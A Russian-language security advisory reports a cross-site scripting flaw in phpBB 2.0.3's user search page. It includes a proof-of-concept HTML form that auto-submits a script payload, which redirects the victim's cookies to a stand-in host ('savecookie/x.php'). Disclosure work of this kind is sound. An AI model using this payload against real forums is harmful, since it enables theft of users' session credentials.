Межсайтовый скриптинг в phpBB
| Дата публикации: | 09.12.2002 |
| Дата изменения: | 17.10.2006 |
| Всего просмотров: | 1464 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | phpBB – популярная доска объявлений для UNIX и Windows систем. Из-за недостаточной фильтрации ввода пользователя, удаленный атакующий может внедрить произвольный код сценария в сгенерированную страницу поиска. Уязвимость может использоваться для кражи опознавательных мандатов, хранящихся в куки. Пример:
html> <body> <form method="post" name="search" action="http://target/search.php?mode=searchuser"> <input type="hidden" name="search_username" value=""/> </form> <SCRIPT> search.search_username.value='Http://savecookie/x.php?Cookie="><script>location=search.search_username.value+document.cookie;</script\>'; document.search.submit(); </script> </body> </html>уязвимость обнаружена в phpBB 2.0.3 |
| Ссылки: | Cross-site Scripting Vulnerability in phpBB 2.0.3 |